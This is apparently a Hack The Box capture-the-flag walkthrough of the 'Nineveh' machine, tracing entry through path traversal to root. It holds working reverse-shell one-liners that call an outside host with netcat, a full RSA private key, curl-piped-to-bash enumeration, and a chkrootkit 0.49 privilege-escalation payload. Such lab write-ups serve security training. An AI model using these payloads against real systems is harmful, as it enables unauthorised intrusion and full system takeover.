Create php file
Database creation.
Table creation.
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.21 4444 >/tmp/f"); ?>
On the field, we paste the php system command to open a reverse shell.
The php file has been created on path /var/tmp/reverse.php.
Start listener
u505@kali:~/HTB/Machines/Nineveh$ rlwrap nc -lvnp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Call reverse.php
If we click on Notes link, we see some notes are added to the bottom of the page. These notes seems to be read from a file.
Playing with the URL, we are able to abuse the URL to open the file /etc/passwd.
http://nineveh.htb/department/manage.php?notes=/files/ninevehNotes.txt/../../var/tmp/reverse.php
With the following URL, we are able to call our reverse shell script.
u505@kali:~/HTB/Machines/Nineveh$ rlwrap nc -lvnp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.43. Ncat: Connection from 10.10.10.43:59278. /bin/sh: 0: can't access tty; job control turned off $ python -c "import pty;pty.spawn('/bin/bash')" /bin/sh: 1: python: not found $ python3 -c "import pty;pty.spawn('/bin/bash')" www-data@nineveh:/var/www/html/department$ stty raw -echo stty raw -echo
User flag
The port ssh is not available externally but is listening on the localhost. So probably we can ssh on the user amrois with the private key we found earlier.
www-data@nineveh:/var/www/html/department$ netstat -napl | grep LISTEN | grep 22 (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp6 0 0 :::22 :::* LISTEN -
So we download the private key.
u505@kali:~/HTB/Machines/Nineveh/www$ cat id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5 FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI 3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo 9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl 1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89 P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1 MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7 fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG -----END RSA PRIVATE KEY----- u505@kali:~/HTB/Machines/Nineveh/www$ sudo python -m SimpleHTTPServer 80 [sudo] password for u505: Serving HTTP on 0.0.0.0 port 80 ... 10.10.10.43 - - [07/May/2020 23:11:07] "GET /id_rsa HTTP/1.1" 200 -
From the target.
www-data@nineveh:/var/www/html/department$ cd /tmp www-data@nineveh:/tmp$ wget -q http://10.10.14.21/id_rsa www-data@nineveh:/tmp$ chmod 600 id_rsa www-data@nineveh:/tmp$ ssh -i id_rsa amrois@127.0.0.1 Could not create directory '/var/www/.ssh'. The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established. ECDSA key fingerprint is SHA256:aWXPsULnr55BcRUl/zX0n4gfJy5fg29KkuvnADFyMvk. Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts). Ubuntu 16.04.2 LTS Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage
133 packages can be updated. 66 updates are security updates.
You have mail. Last login: Mon Jul 3 00:19:59 2017 from 192.168.0.14
amrois@nineveh:~$ cat user.txt <USER_FLAG>
Privileges escalation
We execute the enumeration script
amrois@nineveh:/tmp$ curl http://10.10.14.32/LinEnum.sh | bash ... # For more information see the manual pages of crontab(5) and cron(8) # # m h dom mon dow command */10 * * * * /usr/sbin/report-reset.sh ... [-] Any interesting mail in /var/mail: total 12 drwxrwsr-x 2 root mail 4096 Jul 2 2017 . drwxr-xr-x 14 root root 4096 Jul 2 2017 .. -rw-r--r-- 1 amrois mail 483 Jul 2 2017 amrois ...
It seems there is a crontab but the crontab is owned by amrois, and there is also a non empty mail file in amrois account.
report-reset.sh
amrois@nineveh:~$ ls -l /usr/sbin/report-reset.sh -rwxr-x--- 1 amrois amrois 34 Jul 2 2017 /usr/sbin/report-reset.sh amrois@nineveh:~$ cat /usr/sbin/report-reset.sh #!/bin/bash
rm -rf /report/*.txt amrois@nineveh:~$ ls -l /report/ total 56 -rw-r--r-- 1 amrois amrois 4802 May 11 15:20 report-20-05-11:15:20.txt -rw-r--r-- 1 amrois amrois 4802 May 11 15:21 report-20-05-11:15:21.txt -rw-r--r-- 1 amrois amrois 4802 May 11 15:22 report-20-05-11:15:22.txt -rw-r--r-- 1 amrois amrois 4802 May 11 15:23 report-20-05-11:15:23.txt -rw-r--r-- 1 amrois amrois 4802 May 11 15:24 report-20-05-11:15:24.txt -rw-r--r-- 1 amrois amrois 4802 May 11 15:25 report-20-05-11:15:25.txt -rw-r--r-- 1 amrois amrois 4802 May 11 15:26 report-20-05-11:15:26.txt amrois@nineveh:~$ head /report/report-20-05-11:15:26.txt ROOTDIR is `/' Checking `amd'... not found Checking `basename'... not infected Checking `biff'... not found Checking `chfn'... not infected Checking `chsh'... not infected Checking `cron'... not infected Checking `crontab'... not infected Checking `date'... not infected Checking `du'... not infected
The crontab delete files in report folder. Files seems to be a check report. The origin of the file is still unknown.
/var/mail/amrois
amrois@nineveh:/var/mail$ cat amrois
From root@nineveh.htb Fri Jun 23 14:04:19 2017
Return-Path: <root@nineveh.htb>
X-Original-To: amrois
Delivered-To: amrois@nineveh.htb
Received: by nineveh.htb (Postfix, from userid 1000)
id D289B2E3587; Fri, 23 Jun 2017 14:04:19 -0500 (CDT)
To: amrois@nineveh.htb
From: root@nineveh.htb
Subject: Another Important note!
Message-Id: <20170623190419.D289B2E3587@nineveh.htb>
Date: Fri, 23 Jun 2017 14:04:19 -0500 (CDT)
Amrois! please knock the door next time! 571 290 911
After some search, we find a strange process.
amrois@nineveh:~$ ps -ef | grep kno root 1295 1 1 14:55 ? 00:00:22 /usr/sbin/knockd -d -i ens33 amrois 4077 24483 0 15:30 pts/1 00:00:00 grep --color=auto kno amrois@nineveh:~$ ls -l /etc/kn* -rw-r--r-- 1 root root 354 Aug 5 2017 /etc/knockd.conf amrois@nineveh:~$ cat /etc/knockd.conf [options] logfile = /var/log/knockd.log interface = ens33
[openSSH] sequence = 571, 290, 911 seq_timeout = 5 start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn
[closeSSH] sequence = 911,290,571 seq_timeout = 5 start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn
The knock daemon should open the ssh port with the TCP syn sequence 571 290 and 911
u505@kali:~/HTB/Machines/Nineveh/www$ for x in 571 290 911; do nmap -Pn --max-retries 0 -p $x 10.10.10.43; done Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 23:31 EDT Warning: 10.10.10.43 giving up on port because retransmission cap hit (0). Nmap scan report for nineveh.htb (10.10.10.43) Host is up.
PORT STATE SERVICE 571/tcp filtered umeter
Nmap done: 1 IP address (1 host up) scanned in 1.03 seconds Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 23:31 EDT Warning: 10.10.10.43 giving up on port because retransmission cap hit (0). Nmap scan report for nineveh.htb (10.10.10.43) Host is up.
PORT STATE SERVICE 290/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 23:31 EDT Warning: 10.10.10.43 giving up on port because retransmission cap hit (0). Nmap scan report for nineveh.htb (10.10.10.43) Host is up.
PORT STATE SERVICE 911/tcp filtered xact-backup
Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds
And the ssh port is open and available for amrois.
u505@kali:~/HTB/Machines/Nineveh/www$ ssh -i id_rsa amrois@10.10.10.43 Ubuntu 16.04.2 LTS Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage
133 packages can be updated. 66 updates are security updates.
You have mail. Last login: Thu May 7 22:25:34 2020 from 127.0.0.1
Access of ssh service is not mandatory to resolve the machine, but it is easier.
pspy
We copy pspy by ssh
u505@kali:~/HTB/Machines/Nineveh/www$ scp -i id_rsa /opt/utils/pspy/pspy64 amrois@nineveh.htb:/tmp/ Ubuntu 16.04.2 LTS pspy64 100% 3006KB 3.4MB/s 00:00
And after 1 minute, we observe a root job.
2020/05/11 15:47:01 CMD: UID=0 PID=19515 | /usr/sbin/CRON -f 2020/05/11 15:47:01 CMD: UID=0 PID=19517 | /bin/sh -c /root/vulnScan.sh 2020/05/11 15:47:01 CMD: UID=0 PID=19516 | /bin/sh -c /root/vulnScan.sh 2020/05/11 15:47:01 CMD: UID=0 PID=19518 | /bin/bash /root/vulnScan.sh 2020/05/11 15:47:01 CMD: UID=0 PID=19520 | /bin/sh /usr/bin/chkrootkit ...
Each minute, the script /root/vulnScan.sh is called by user root. The command chkrootkit is called. It seems this is this script that generated the report files.
u505@kali:~/HTB/Machines/Nineveh$ searchsploit chkrootkit
----------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------- ----------------------------------------
Chkrootkit - Local Privilege Escalation (Metasploit) | exploits/linux/local/38775.rb
Chkrootkit 0.49 - Local Privilege Escalation | exploits/linux/local/33899.txt
----------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/Nineveh$ searchsploit -m 33899
Exploit: Chkrootkit 0.49 - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/33899
Path: /usr/share/exploitdb/exploits/linux/local/33899.txt
File Type: ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Nineveh/33899.txt
We cannot verify the version of chkrootkit, but the exploit 33899 explains that the file ${ROOTDIR}tmp/update is executed as root. The first line of the report files is
amrois@nineveh:~$ ls -l /report/
total 32
-rw-r--r-- 1 amrois amrois 4802 May 11 15:50 report-20-05-11:15:50.txt
-rw-r--r-- 1 amrois amrois 4802 May 11 15:51 report-20-05-11:15:51.txt
-rw-r--r-- 1 amrois amrois 4802 May 11 15:52 report-20-05-11:15:52.txt
-rw-r--r-- 1 amrois amrois 4802 May 11 15:53 report-20-05-11:15:53.txt
amrois@nineveh:~$ head -n 5 /report/report-20-05-11:15:50.txt
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
So normally, if we create the file /tmp/update, it should be executed as root each minute.
Root Flag
We start the listener
u505@kali:~/HTB/Machines/Nineveh$ rlwrap nc -nlvp 4445 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4445 Ncat: Listening on 0.0.0.0:4445
/tmp/update file creation
amrois@nineveh:/tmp$ echo "rm /tmp/g;mkfifo /tmp/g;cat /tmp/g|/bin/sh -i 2>&1|nc 10.10.14.21 4445 >/tmp/g" > update amrois@nineveh:/tmp$ cat update rm /tmp/g;mkfifo /tmp/g;cat /tmp/g|/bin/sh -i 2>&1|nc 10.10.14.21 4445 >/tmp/g amrois@nineveh:/tmp$ ls -l update -rw-rw-r-- 1 amrois amrois 79 May 7 22:53 update amrois@nineveh:/tmp$ chmod +x update
Within the minute
u505@kali:~/HTB/Machines/Nineveh$ rlwrap nc -lnvp 4445 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4445 Ncat: Listening on 0.0.0.0:4445 Ncat: Connection from 10.10.10.43. Ncat: Connection from 10.10.10.43:42754. /bin/sh: 0: can't access tty; job control turned off # python3 -c "import pty;pty.spawn('/bin/bash')" root@nineveh:~# stty raw -echo stty raw -echo root@nineveh:~# cat root.txt <ROOT_FLAG>
Now we can confirm the chkrootkit version.
root@nineveh:~# /usr/bin/chkrootkit -V chkrootkit version 0.49
References
Daniel Simao 14:38, 10 May 2020 (EDT)
